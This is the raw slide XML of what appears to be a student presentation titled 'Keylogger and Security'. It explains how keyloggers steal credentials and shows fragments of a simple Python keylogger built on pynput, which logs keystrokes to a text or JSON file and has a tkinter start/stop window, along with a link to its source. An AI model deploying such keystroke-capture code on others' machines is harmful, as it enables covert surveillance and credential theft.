            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25360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xml"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_rels/slide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39252" y="2457923"/>
            <a:ext cx="8450729" cy="509114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" spc="15" dirty="0"/>
              <a:t>KOTA HARIKA SESHA MANI</a:t>
            </a:r>
            <a:endParaRPr spc="15" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6436807" y="2920399"/>
            <a:ext cx="2432275"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D83A-16FC-0DC4-8AE2-AB8B86C0FD4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="990600"/>
            <a:ext cx="10681335" cy="3077766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(side=LEFT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_button</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(side=RIGHT)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55F5ED2-416E-6A73-374B-95553742245C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="3657600"/>
            <a:ext cx="2392887" cy="2629128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272241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14913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937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40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1EE112B5-808D-8A68-D162-6AD0F842AAC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2553315" y="2758767"/>
            <a:ext cx="6334126" cy="2462213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>secuetre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> accounts in a system or computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>In this solution the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>muose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t> and keyboard control and it store in a txt file what we type on keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="320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7" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FC879F-54C5-DF41-9278-7F4E757B4D14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501097" y="2496129"/>
            <a:ext cx="6100916" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>keylogger lets the company record and process your keystrokes, so it can track anything you type on your keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>By these wireframes we can protect our company and it is useful to find information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>To create a wireframes we can have software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1"/>
              <a:t>to create it.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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2" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E4CC72-D216-4C0D-A3B1-B04338A93FE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="2439687"/>
            <a:ext cx="6396191" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="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72AB-61F9-DAD5-DCD2-BFD353556A46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Project Link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52444072-F338-1964-F13D-FF88C4C97453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="3187363"/>
            <a:ext cx="10972800" cy="483273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>https://github.com/harikakota04/Key-logger/blob/main/keylogger.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2798655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911586" y="896070"/>
            <a:ext cx="5800851" cy="51816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 name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67D4CAE7-92FB-49A0-191E-7B71A5C2B67F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889193" y="3039171"/>
            <a:ext cx="8864407" cy="2780604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6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28E9A193-B518-D959-B701-5A73BB4CB011}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704975" y="1524253"/>
            <a:ext cx="7774078" cy="3970318"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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A keylogger is a key stroker/keyboard capturing is a form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> or hardware that keeps track of and records your keystrokes as you type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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It takes the information and sends it to a hacker using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>command-and-control (C&amp;C) server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>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The hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>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4344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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC2E613-13CF-B390-7C8E-646CA04B0F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786785" y="1905000"/>
            <a:ext cx="6940869" cy="2215991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>hacker then analyzes the keystrokes to locate usernames and passwords and uses them to hack into otherwise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>secure systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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4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To tackle this issue we are therefore using a software keylogger that can be remotely ins</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400"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5" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B9517B-408D-5892-CAB8-F64538390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4174" y="4452192"/>
            <a:ext cx="3552826" cy="1567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10400" y="9969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id="{4CB9494F-CB3D-99CF-97DE-18384C4FF339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717960" y="1589285"/>
            <a:ext cx="8858250" cy="3693319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0"/>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5" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1D2CF31-2675-5BCC-34D8-DA2BDC8D833D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3215622"/>
            <a:ext cx="1699407" cy="213378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2520CC89-2BCC-CDBE-D513-8EDC5D7FB8D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4242699" y="3249914"/>
            <a:ext cx="2088061" cy="1447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10400" y="13534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2083" y="793340"/>
            <a:ext cx="10681335"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9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04424235-4229-535E-03E7-C5138D572D07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546669" y="2240668"/>
            <a:ext cx="8897368" cy="3016210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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5443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10437" y="11835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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5670CA18-5EB9-40D3-8216-A7599386802B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2209800"/>
            <a:ext cx="5486400" cy="4001095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000"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F68C-8AB2-5381-F366-AF79105535D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="5232202"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(key):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, keys</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    )</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
